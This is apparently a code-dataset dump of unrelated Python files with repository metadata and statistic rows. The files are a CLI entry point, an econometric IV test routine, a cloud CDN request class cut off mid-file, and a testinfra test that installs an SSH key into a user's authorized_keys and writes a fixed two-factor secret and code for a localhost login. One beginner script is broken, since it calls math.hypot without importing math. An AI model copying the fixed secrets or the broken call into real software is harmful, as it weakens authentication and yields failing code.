        # continuation yields equal results.
        return self(identity) == other(identity)
| 27.926471 | 80 | 0.590311 | 249 | 1,899 | 4.417671 | 0.349398 | 0.054545 | 0.072727 | 0.046364 | 0.062727 | 0.062727 | 0 | 0 | 0 | 0 | 0 | 0.008505 | 0.256977 | 1,899 | 67 | 81 | 28.343284 | 0.771084 | 0.381253 | 0 | 0 | 0 | 0 | 0.019417 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.32 | false | 0 | 0.12 | 0.12 | 0.76 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
e85528368232466fd8bf51ab7cbec53b71448f7f | 115 | py | Python | main.py | aamirza/bookworm | bdc9411d0b3e9a3c06638141fcb03227db247654 | [
"MIT"
] | 1 | 2021-11-09T11:32:49.000Z | 2021-11-09T11:32:49.000Z | main.py | aamirza/bookworm | bdc9411d0b3e9a3c06638141fcb03227db247654 | [
"MIT"
] | null | null | null | main.py | aamirza/bookworm | bdc9411d0b3e9a3c06638141fcb03227db247654 | [
"MIT"
] | null | null | null | import sys
from cli import parser
def main():
    # Delegate command-line handling to the CLI parser, passing the raw
    # argument vector through.
    parser.main(sys.argv)


if __name__ == '__main__':
    main()
| 9.583333 | 26 | 0.643478 | 16 | 115 | 4.125 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.234783 | 115 | 11 | 27 | 10.454545 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0.069565 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | true | 0 | 0.333333 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
e868646540c7d3d62ea2181da3c2348537e04088 | 342 | py | Python | Python_do_zero_Guanabara/03_Utilizando Módulos/desafio/17_desafio.py | HenriqueSOliver/Projetos_Python | f18c5a343ad1b746a12bd372298b2debe9bc65ec | [
"MIT"
] | null | null | null | Python_do_zero_Guanabara/03_Utilizando Módulos/desafio/17_desafio.py | HenriqueSOliver/Projetos_Python | f18c5a343ad1b746a12bd372298b2debe9bc65ec | [
"MIT"
] | null | null | null | Python_do_zero_Guanabara/03_Utilizando Módulos/desafio/17_desafio.py | HenriqueSOliver/Projetos_Python | f18c5a343ad1b746a12bd372298b2debe9bc65ec | [
"MIT"
] | null | null | null | #faça um programa que leia o comprimento do cateto oposto e de cateto adjacente de um triangulo retangulo, calcule e mostre o comprimento da hipotenusa.
from math import hypot
co = float(input('Comprimento do cateto oposto: '))
ca = float(input('Comprimento do cateto adijacente: '))
print(f'A hipotenusa vai medir {math.hypot(co, ca):.2f}') | 57 | 152 | 0.766082 | 54 | 342 | 4.851852 | 0.62963 | 0.148855 | 0.217557 | 0.19084 | 0.221374 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003413 | 0.143275 | 342 | 6 | 153 | 57 | 0.890785 | 0.44152 | 0 | 0 | 0 | 0 | 0.581152 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
e876076773eca1864c481da9b3a14b00dd7cca2b | 613 | py | Python | pyutilib/excel/base.py | PyUtilib/PyUtilib | d99406f2af1fb62268c34453a2fbe6bd4a7348f0 | [
"BSD-3-Clause"
] | 24 | 2016-04-02T10:00:02.000Z | 2021-03-02T16:40:18.000Z | pyutilib/excel/base.py | PyUtilib/PyUtilib | d99406f2af1fb62268c34453a2fbe6bd4a7348f0 | [
"BSD-3-Clause"
] | 105 | 2015-10-29T03:29:58.000Z | 2021-12-30T22:00:45.000Z | pyutilib/excel/base.py | PyUtilib/PyUtilib | d99406f2af1fb62268c34453a2fbe6bd4a7348f0 | [
"BSD-3-Clause"
] | 22 | 2016-01-21T15:35:25.000Z | 2021-05-15T20:17:44.000Z | # _________________________________________________________________________
#
# PyUtilib: A Python utility library.
# Copyright (c) 2008 Sandia Corporation.
# This software is distributed under the BSD License.
# Under the terms of Contract DE-AC04-94AL85000 with Sandia Corporation,
# the U.S. Government retains certain rights in this software.
# _________________________________________________________________________
class ExcelSpreadsheet_base(object):
    """Base interface for spreadsheet backends.

    Every capability defaults to unsupported (False); concrete backends
    override the predicates they actually implement.
    """

    def can_read(self):
        """Whether this backend can read spreadsheets."""
        return False

    def can_write(self):
        """Whether this backend can write spreadsheets."""
        return False

    def can_calculate(self):
        """Whether this backend can evaluate spreadsheet formulas."""
        return False
| 29.190476 | 76 | 0.771615 | 61 | 613 | 5.295082 | 0.721311 | 0.055728 | 0.139319 | 0.111455 | 0.130031 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025743 | 0.176183 | 613 | 20 | 77 | 30.65 | 0.613861 | 0.672104 | 0 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0 | 0 | 0.428571 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
e87e8c86eb627d9c24a150fc0c0a9b8f1bf370ff | 1,177 | py | Python | molecule/default/tests/test_2fa.py | mtpettyp/ansible-base | 7bf8d2a267069ac8a6659899b354da7f05ba092f | [
"MIT"
] | null | null | null | molecule/default/tests/test_2fa.py | mtpettyp/ansible-base | 7bf8d2a267069ac8a6659899b354da7f05ba092f | [
"MIT"
] | null | null | null | molecule/default/tests/test_2fa.py | mtpettyp/ansible-base | 7bf8d2a267069ac8a6659899b354da7f05ba092f | [
"MIT"
] | null | null | null | import pytest
"""Role testing 2fa using testinfra."""
@pytest.fixture(autouse=True)
def run_around_tests(host):
    # Install sshpass so tests can answer ssh prompts non-interactively,
    # and remove any google-authenticator state left by a previous run.
    host.run('apt-get install sshpass')
    host.run("rm ~test1/.google_authenticator")
    # Generate a throwaway ed25519 key pair for root and authorise it for
    # the `test1` account so key-based ssh logins succeed.
    host.run(
        "yes '' | ssh-keygen -t ed25519 -f /root/.ssh/id_ed25519 -N ''")
    host.run(
        "cat /root/.ssh/id_ed25519.pub >> /home/test1/.ssh/authorized_keys")
    yield
    # Teardown: remove the google-authenticator config a test may have created.
    host.run("rm ~test1/.google_authenticator")
def test_ssh(host):
    # Ensure ssh works with google authenticator not setup
    cmd = host.run("ssh -o StrictHostKeychecking=no test1@localhost")
    assert cmd.succeeded
    # Ensure ssh works with google authenticator setup
    # Build a minimal ~test1/.google_authenticator: a base32 secret, the
    # TOTP_AUTH mode marker, and 12345678 as a scratch/verification code
    # (the same value sshpass supplies below).
    host.run(
        'echo "ABCDEFGHIJKLMNOPQRSTUVWXYZ" > ~test1/.google_authenticator')
    host.run('echo "\\" TOTP_AUTH" >> ~test1/.google_authenticator')
    host.run('echo "12345678" >> ~test1/.google_authenticator')
    # Restrict ownership/permissions — presumably required by the PAM
    # module before it will read the file (TODO confirm).
    host.run('chmod 400 ~test1/.google_authenticator')
    host.run('chown test1:test1 ~test1/.google_authenticator')
    # sshpass answers the "Verification code:" prompt with the code above.
    cmd = host.run(
        "sshpass -p 12345678 -P 'Verification code:' "
        "ssh -o StrictHostKeychecking=no test1@localhost")
    assert cmd.succeeded
| 29.425 | 76 | 0.680544 | 147 | 1,177 | 5.353742 | 0.421769 | 0.106734 | 0.213469 | 0.177891 | 0.504447 | 0.416773 | 0.149936 | 0.149936 | 0.149936 | 0 | 0 | 0.048958 | 0.184367 | 1,177 | 39 | 77 | 30.179487 | 0.770833 | 0.085811 | 0 | 0.291667 | 0 | 0 | 0.576402 | 0.338491 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.083333 | false | 0.083333 | 0.041667 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
e87ed7067cd265af638d0d392c05bfda959d96fe | 53 | py | Python | files/image/cron/crontab/__init__.py | ZPascal/container-manager | 5f3c8784d7b73ef52baae9f2bc40bcfc660e6d72 | [
"Apache-2.0"
] | null | null | null | files/image/cron/crontab/__init__.py | ZPascal/container-manager | 5f3c8784d7b73ef52baae9f2bc40bcfc660e6d72 | [
"Apache-2.0"
] | 1 | 2021-12-01T23:10:29.000Z | 2021-12-01T23:10:29.000Z | files/image/cron/crontab/__init__.py | ZPascal/container-manager | 5f3c8784d7b73ef52baae9f2bc40bcfc660e6d72 | [
"Apache-2.0"
] | null | null | null | from ._crontab import CronTab
__all__ = ["CronTab"]
| 13.25 | 29 | 0.735849 | 6 | 53 | 5.666667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150943 | 53 | 3 | 30 | 17.666667 | 0.755556 | 0 | 0 | 0 | 0 | 0 | 0.132075 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
e880e1334d1a852e61408a411187468db5a09d3d | 413 | py | Python | AutoXGBoost/imports.py | KOLANICH/AutoXGBoost | 6c539207a7f5a725eec63ec9f0c32accf2636d48 | [
"Unlicense"
] | 1 | 2018-08-24T03:33:13.000Z | 2018-08-24T03:33:13.000Z | AutoXGBoost/imports.py | KOLANICH/AutoXGBoost | 6c539207a7f5a725eec63ec9f0c32accf2636d48 | [
"Unlicense"
] | null | null | null | AutoXGBoost/imports.py | KOLANICH/AutoXGBoost | 6c539207a7f5a725eec63ec9f0c32accf2636d48 | [
"Unlicense"
] | null | null | null | import sys
import types
import typing
from typing import *
from functools import partial, wraps
from pprint import pformat, pprint
import warnings
from pandas import DataFrame, Series
import scipy as np
import pandas
from pandas import DataFrame
try:
    from tqdm.autonotebook import tqdm as mtqdm
except ImportError:
    # Bug fix: the bare `except:` also swallowed KeyboardInterrupt and
    # SystemExit; only a missing `tqdm.autonotebook` should trigger the
    # plain-tqdm fallback.
    from tqdm import tqdm as mtqdm
import xgboost as xgb
from lazily import lazyImport | 18.772727 | 45 | 0.774818 | 59 | 413 | 5.423729 | 0.440678 | 0.075 | 0.1 | 0.15625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.208232 | 413 | 22 | 46 | 18.772727 | 0.978593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.882353 | 0 | 0.882353 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
e89a540fc9f92159b09f9232dbedee1f730d3a6a | 109 | py | Python | code/abc143_b_02.py | KoyanagiHitoshi/AtCoder | 731892543769b5df15254e1f32b756190378d292 | [
"MIT"
] | 3 | 2019-08-16T16:55:48.000Z | 2021-04-11T10:21:40.000Z | code/abc143_b_02.py | KoyanagiHitoshi/AtCoder | 731892543769b5df15254e1f32b756190378d292 | [
"MIT"
] | null | null | null | code/abc143_b_02.py | KoyanagiHitoshi/AtCoder | 731892543769b5df15254e1f32b756190378d292 | [
"MIT"
] | null | null | null | N=int(input())
d=list(map(int,input().split()))
print(sum(d[x]*d[y] for x in range(N) for y in range(x+1,N))) | 36.333333 | 61 | 0.623853 | 27 | 109 | 2.518519 | 0.555556 | 0.235294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010101 | 0.091743 | 109 | 3 | 61 | 36.333333 | 0.676768 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
e8aa3c88fa78f895163f59ef12429d8b154f55bb | 304 | py | Python | paderbox/array/intervall.py | JanekEbb/paderbox | 7cd3bf92380e05ec856936d21a64d0a8a3ff0fca | [
"MIT"
] | 25 | 2019-12-21T21:10:08.000Z | 2022-02-04T10:40:19.000Z | paderbox/array/intervall.py | JanekEbb/paderbox | 7cd3bf92380e05ec856936d21a64d0a8a3ff0fca | [
"MIT"
] | 32 | 2019-12-21T21:48:24.000Z | 2022-03-31T08:20:39.000Z | paderbox/array/intervall.py | JanekEbb/paderbox | 7cd3bf92380e05ec856936d21a64d0a8a3ff0fca | [
"MIT"
] | 254 | 2019-12-16T08:15:08.000Z | 2021-11-26T12:41:12.000Z | from .interval import *
from .interval import ArrayInterval as ArrayIntervall
import warnings
# Emit a proper deprecation warning for the misspelled module name.
warnings.warn(
    'Using ArrayIntervall (with double l) from paderbox.array.intervall (with '
    'double l) is deprecated. Use ArrayInterval from paderbox.array.interval '
    '(with a single l) instead.',
    # Deprecations should use DeprecationWarning (not the default
    # UserWarning) so tooling can filter them, and stacklevel=2 attributes
    # the warning to the importing module rather than this shim.
    DeprecationWarning,
    stacklevel=2,
)
| 30.4 | 79 | 0.756579 | 38 | 304 | 6.052632 | 0.552632 | 0.104348 | 0.156522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164474 | 304 | 9 | 80 | 33.777778 | 0.905512 | 0 | 0 | 0 | 0 | 0 | 0.5625 | 0.154605 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.375 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
e8abf7ea4446423696d80792fe2cb2b54d44aefa | 11,176 | py | Python | fixedeffect/iv/ivtest.py | rphilipzhang/FixedEffectModel | 017a6f555fff44392d33e45e26c406d02ddde109 | [
"BSD-3-Clause"
] | null | null | null | fixedeffect/iv/ivtest.py | rphilipzhang/FixedEffectModel | 017a6f555fff44392d33e45e26c406d02ddde109 | [
"BSD-3-Clause"
] | null | null | null | fixedeffect/iv/ivtest.py | rphilipzhang/FixedEffectModel | 017a6f555fff44392d33e45e26c406d02ddde109 | [
"BSD-3-Clause"
] | null | null | null | import pandas as pd
import numpy as np
import scipy as sp
from io import StringIO
import warnings
from statsmodels.iolib.table import SimpleTable
from scipy.stats import chi2
import statsmodels.api as sm
from ..utils.Forg import forg
from ..utils.TableFormat import gen_fmt, fmt_2
#function generate instrumental variables test
def ivtest(result):
"""
:param result: List of endogenous variables
:return: a table of result
"""
if result.iv == []:
raise NameError('there is no iv')
exog_x = result.exog_x
iv_col = result.iv
out_col = result.dependent
endog_x = result.endog_x
if result.endog_x:
old_x = exog_x + result.endog_x
if 'const' in result.x_second_stage:
old_x = ['const'] + old_x
else:
old_x = exog_x
for i in endog_x:
if i in old_x:
old_x.remove(i)
all_exo_x = old_x + iv_col
demeaned_df = result.demeaned_df #pass object so easier to reference
z = demeaned_df[iv_col].values
y = demeaned_df[out_col].values
x_exog = demeaned_df[old_x].values
x_endog = demeaned_df[endog_x].values
z_ = demeaned_df[all_exo_x].values
nobs = result.demeaned_df.shape[0]
k1 = len(old_x)
k2 = len(iv_col)
# x related stuff
xpx_inv = np.linalg.inv(np.dot(x_exog.T, x_exog))
px = np.dot(np.dot(x_exog,xpx_inv),x_exog.T)
m_x = np.identity(nobs) - px
y_proj = np.dot(m_x, x_endog)
z_proj = np.dot(m_x, z)
# z related stuff
zpz_inv_proj = np.linalg.inv(np.dot(z_proj.T, z_proj))
pz_proj = np.dot(np.dot(z_proj,zpz_inv_proj),z_proj.T)
zpz_full = np.dot(z_.T, z_)
zpz_inv_full = np.linalg.inv(zpz_full)
pz_full = np.dot(np.dot(z_,zpz_inv_full),z_.T)
m_z_full = np.identity(nobs) - pz_full
sigma_vv = np.dot(np.dot(x_endog.T,m_z_full),x_endog)/(nobs - k1 - k2)
sigma_vv_inv_sqrt = np.linalg.inv(sp.linalg.sqrtm(sigma_vv))
fstat_matrix_meat = np.dot(np.dot(y_proj.T, pz_proj),y_proj)
fstat_matrix = np.dot(np.dot(sigma_vv_inv_sqrt.T, fstat_matrix_meat),sigma_vv_inv_sqrt)/k2
cd_stat = min(np.linalg.eigvals(fstat_matrix))
cd_stat = round(cd_stat,6)
# critical value in stock and yogo 2005
tab_5_2 = u"""\
k2_tab,0.1,0.15,0.2,0.25,0.1,0.15,0.2,0.25
1,16.38,8.96,6.66,5.53,,,,
2,19.93,11.59,8.75,7.25,7.03,4.58,3.95,3.63
3,22.3,12.83,9.54,7.8,13.43,8.18,6.4,5.45
4,24.58,13.96,10.26,8.31,16.87,9.93,7.54,6.28
5,26.87,15.09,10.98,8.84,19.45,11.22,8.38,6.89
6,29.18,16.23,11.72,9.38,21.68,12.33,9.1,7.42
7,31.5,17.38,12.48,9.93,23.72,13.34,9.77,7.91
8,33.84,18.54,13.24,10.5,25.64,14.31,10.41,8.39
9,36.19,19.71,14.01,11.07,27.51,15.24,11.03,8.85
10,38.54,20.88,14.78,11.65,29.32,16.16,11.65,9.31
11,40.9,22.06,15.56,12.23,31.11,17.06,12.25,9.77
12,43.27,23.24,16.35,12.82,32.88,17.95,12.86,10.22
13,45.64,24.42,17.14,13.41,34.62,18.84,13.45,10.68
14,48.01,25.61,17.93,14,36.36,19.72,14.05,11.13
15,50.39,26.8,18.72,14.6,38.08,20.6,14.65,11.58
16,52.77,27.99,19.51,15.19,39.8,21.48,15.24,12.03
17,55.15,29.19,20.31,15.79,41.51,22.35,15.83,12.49
18,57.53,30.38,21.1,16.39,43.22,23.22,16.42,12.94
19,59.92,31.58,21.9,16.99,44.92,24.09,17.02,13.39
20,62.3,32.77,22.7,17.6,46.62,24.96,17.61,13.84
21,64.69,33.97,23.5,18.2,48.31,25.82,18.2,14.29
22,67.07,35.17,24.3,18.8,50.01,26.69,18.79,14.74
23,69.46,36.37,25.1,19.41,51.7,27.56,19.38,15.19
24,71.85,37.57,25.9,20.01,53.39,28.42,19.97,15.64
25,74.24,38.77,26.71,20.61,55.07,29.29,20.56,16.1
26,76.62,39.97,27.51,21.22,56.76,30.15,21.15,16.55
27,79.01,41.17,28.31,21.83,58.45,31.02,21.74,17
28,81.4,42.37,29.12,22.43,60.13,31.88,22.33,17.45
29,83.79,43.57,29.92,23.04,61.82,32.74,22.92,17.9
30,86.17,44.78,30.72,23.65,63.51,33.61,23.51,18.35 """
#not used for now. may add in future
tab_5_1 = u"""\
k2_tab,0.05,0.1,0.2,0.3,0.05,0.1,0.2,0.3,0.05,0.1,0.2,0.3
3,13.91,9.08,6.46,5.39,,,,,,,,
4,16.85,10.27,6.71,5.34,11.04,7.56,5.57,4.73,,,,
5,18.37,10.83,6.77,5.25,13.97,8.78,5.91,4.79,9.53,6.61,4.99,4.3
6,19.28,11.12,6.76,5.15,15.72,9.48,6.08,4.78,12.2,7.77,5.35,4.4
7,19.86,11.29,6.73,5.07,16.88,9.92,6.16,4.76,13.95,8.5,5.56,4.44
8,20.25,11.39,6.69,4.99,17.7,10.22,6.2,4.73,15.18,9.01,5.69,4.46
9,20.53,11.46,6.65,4.92,18.3,10.43,6.22,4.69,16.1,9.37,5.78,4.46
10,20.74,11.49,6.61,4.86,18.76,10.58,6.23,4.66,16.8,9.64,5.83,4.45
11,20.9,11.51,6.56,4.8,19.12,10.69,6.23,4.62,17.35,9.85,5.87,4.44
12,21.01,11.52,6.53,4.75,19.4,10.78,6.22,4.59,17.8,10.01,5.9,4.42
13,21.1,11.52,6.49,4.71,19.64,10.84,6.21,4.56,18.17,10.14,5.92,4.41
14,21.18,11.52,6.45,4.67,19.83,10.89,6.2,4.53,18.47,10.25,5.93,4.39
15,21.23,11.51,6.42,4.63,19.98,10.93,6.19,4.5,18.73,10.33,5.94,4.37
16,21.28,11.5,6.39,4.59,20.12,10.96,6.17,4.48,18.94,10.41,5.94,4.36
17,21.31,11.49,6.36,4.56,20.23,10.99,6.16,4.45,19.13,10.47,5.94,4.34
18,21.34,11.48,6.33,4.53,20.33,11,6.14,4.43,19.29,10.52,5.94,4.32
19,21.36,11.46,6.31,4.51,20.41,11.02,6.13,4.41,19.44,10.56,5.94,4.31
20,21.38,11.45,6.28,4.48,20.48,11.03,6.11,4.39,19.56,10.6,5.93,4.29
21,21.39,11.44,6.26,4.46,20.54,11.04,6.1,4.37,19.67,10.63,5.93,4.28
22,21.4,11.42,6.24,4.43,20.6,11.05,6.08,4.35,19.77,10.65,5.92,4.27
23,21.41,11.41,6.22,4.41,20.65,11.05,6.07,4.33,19.86,10.68,5.92,4.25
24,21.41,11.4,6.2,4.39,20.69,11.05,6.06,4.32,19.94,10.7,5.91,4.24
25,21.42,11.38,6.18,4.37,20.73,11.06,6.05,4.3,20.01,10.71,5.9,4.23
26,21.42,11.37,6.16,4.35,20.76,11.06,6.03,4.29,20.07,10.73,5.9,4.21
27,21.42,11.36,6.14,4.34,20.79,11.06,6.02,4.27,20.13,10.74,5.89,4.2
28,21.42,11.34,6.13,4.32,20.82,11.05,6.01,4.26,20.18,10.75,5.88,4.19
29,21.42,11.33,6.11,4.31,20.84,11.05,6,4.24,20.23,10.76,5.88,4.18
30,21.42,11.32,6.09,4.29,20.86,11.05,5.99,4.23,20.27,10.77,5.87,4.17
"""
tab_5_1 = StringIO(tab_5_1)
tab_5_2 = StringIO(tab_5_2)
df_5_1 = pd.read_csv(tab_5_1)
df_5_2 = pd.read_csv(tab_5_2)
N = len(endog_x)
critical_val = []
if N==1:
stat_5p = forg(df_5_2['0.1'].iloc[k2-1],4)
stat_10p = forg(df_5_2['0.15'].iloc[k2-1],4)
stat_20p = forg(df_5_2['0.2'].iloc[k2-1],4)
stat_30p = forg(df_5_2['0.25'].iloc[k2-1],4)
critical_val = [(stat_5p, stat_10p, stat_20p, stat_30p)]
elif N==2:
stat_5p = forg(df_5_2['0.1.1'].iloc[k2-1],4)
stat_10p = forg(df_5_2['0.15.1'].iloc[k2-1],4)
stat_20p = forg(df_5_2['0.2.1'].iloc[k2-1],4)
stat_30p = forg(df_5_2['0.25.1'].iloc[k2-1],4)
critical_val = [(stat_5p, stat_10p, stat_20p, stat_30p)]
else:
warnings.warn("Critical values are not provided for number of endogenous variables greater than 3")
critical_val = [(0,0,0,0)]
#-------------------------------------------------------------#
#-------------------- over identification --------------------#
#-------------------------------------------------------------#
if len(iv_col) <= len(endog_x):
warnings.warn("There is no over identification, number of iv <= number of endogenous vars")
sargan_stat = 0
sargan_stat_p_val = 0
b_stat = 0
b_stat_p_val = 0
else:
resid = result.demeaned_df['resid'].values
df_overid = len(all_exo_x)-len(exog_x) # number of overidentification constraints
s_n_1 = np.dot(np.dot(resid,pz_full),resid.T)
s_n_2 = np.dot(resid,resid.T)/nobs
sargan_stat = round(s_n_1/s_n_2,6)
sargan_stat_p_val =round(1 - chi2.cdf(sargan_stat, df_overid),6)
b_1 = s_n_1/df_overid
b_2 = (np.dot(np.dot(resid,m_z_full),resid.T))/(nobs - len(all_exo_x))
b_stat = round(b_1/b_2,6)
b_stat_p_val = round(1 - chi2.cdf(b_stat, df_overid),6)
#-------------------------------------------------------------#
#-------------------- endogeneity test --------------------#
#-------------------------------------------------------------#
uc = demeaned_df['resid'].values
model_test = sm.OLS(demeaned_df[out_col], demeaned_df[old_x + endog_x])
result_test = model_test.fit()
u_e = result_test.resid
z_test = demeaned_df[old_x + iv_col + endog_x ].values
zpz_test = np.dot(z_test.T,z_test)
zpz_test_inv = np.linalg.inv(zpz_test)
pz_test = np.dot(np.dot(z_test,zpz_test_inv),z_test.T)
u_c = demeaned_df.resid.values
#d1 = np.dot(np.dot(u_e.T,pz_test),u_e)
d1 = np.dot(np.dot(u_e.T,pz_test),u_e)
d2 = np.dot(np.dot(u_c.T,pz_full),u_c)
d3 = np.dot(u_e.T,u_e)/nobs
durbin_stat = (d1-d2)/d3
durbin_stat_p_val = round(1 - chi2.cdf(durbin_stat, len(endog_x)),6)
#-------------------------------------------------------#
#-------------------- format output --------------------#
#-------------------------------------------------------#
gen_title = 'Weak IV test with critical values based on 2SLS size'
stat_header = None
gen_stubs = ['Cragg-Donald Statistics:','number of instrumental variables:', 'number of endogenous variables:']
cd_test_stat = [(cd_stat,),(k2,),(N,)]
cd_tab = SimpleTable(cd_test_stat,
stat_header,
gen_stubs,
title = gen_title,
txt_fmt = gen_fmt)
wald_header = ['5%', '10%', '20%', '30%']
wald_test_stat = critical_val
tab_row_name = ['2SLS Size of nominal 5% Wald test']
critical_val_tab = SimpleTable(wald_test_stat,
wald_header,
tab_row_name,
title = None)
print(cd_tab)
print(critical_val_tab)
print('H0: Instruments are weak')
#---------------------------------------------------------#
print()
sargan = (forg(sargan_stat,4),forg(sargan_stat_p_val,4))
Basmann = (forg(b_stat,4),forg(b_stat_p_val,4))
gen_title2 = 'Over identification test - nonrobust'
stat_header2 = ['test statistics', 'p values']
gen_stubs2 = ['Sargan Statistics:','Basmann Statistics:']
overid_stat = [sargan,Basmann]
critical_val_tab = SimpleTable(overid_stat,
stat_header2,
gen_stubs2,
title = gen_title2)
print(critical_val_tab)
#---------------------------------------------------------#
print()
durbin = (forg(durbin_stat,4),forg(durbin_stat_p_val,4))
gen_title3 = 'Tests of endogeneity'
stat_header3 = ['test statistics', 'p values']
gen_stubs3 = ['Durbin Statistics:']
endog_stat = [durbin]
durbin_tab = SimpleTable(endog_stat,
stat_header3,
gen_stubs3,
title = gen_title3)
print(durbin_tab)
print('H0: variables are exogenous')
return | 38.940767 | 115 | 0.561024 | 2,321 | 11,176 | 2.561827 | 0.127962 | 0.026909 | 0.014127 | 0.020182 | 0.134712 | 0.073495 | 0.073158 | 0.062563 | 0.053986 | 0.053986 | 0 | 0.260884 | 0.206693 | 11,176 | 287 | 116 | 38.940767 | 0.409768 | 0.089299 | 0 | 0.042453 | 0 | 0.273585 | 0.417374 | 0.325864 | 0 | 0 | 0 | 0 | 0 | 1 | 0.004717 | false | 0 | 0.04717 | 0 | 0.056604 | 0.037736 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
e8b08e07a124a5894e0a2f6c454b7b7c1764e371 | 2,652 | py | Python | qcloudsdkcdn/AddYYCdnHostRequest.py | f3n9/qcloudcli | b965a4f0e6cdd79c1245c1d0cd2ca9c460a56f19 | [
"Apache-2.0"
] | null | null | null | qcloudsdkcdn/AddYYCdnHostRequest.py | f3n9/qcloudcli | b965a4f0e6cdd79c1245c1d0cd2ca9c460a56f19 | [
"Apache-2.0"
] | null | null | null | qcloudsdkcdn/AddYYCdnHostRequest.py | f3n9/qcloudcli | b965a4f0e6cdd79c1245c1d0cd2ca9c460a56f19 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from qcloudsdkcore.request import Request
class AddYYCdnHostRequest(Request):
    """Request object for the Tencent Cloud CDN ``AddYYCdnHost`` API action.

    Each ``get_*``/``set_*`` pair reads or writes one request parameter by
    its wire name via the base class's parameter store.
    """

    def __init__(self):
        # Service, version, action and endpoint are fixed for this request.
        super(AddYYCdnHostRequest, self).__init__(
            'cdn', 'qcloudcliV1', 'AddYYCdnHost', 'cdn.api.qcloud.com')

    def get_antiStealingLink(self):
        return self.get_params().get('antiStealingLink')

    def set_antiStealingLink(self, antiStealingLink):
        self.add_param('antiStealingLink', antiStealingLink)

    def get_cacheRule(self):
        return self.get_params().get('cacheRule')

    def set_cacheRule(self, cacheRule):
        self.add_param('cacheRule', cacheRule)

    def get_ctcBackupCnc(self):
        return self.get_params().get('ctcBackupCnc')

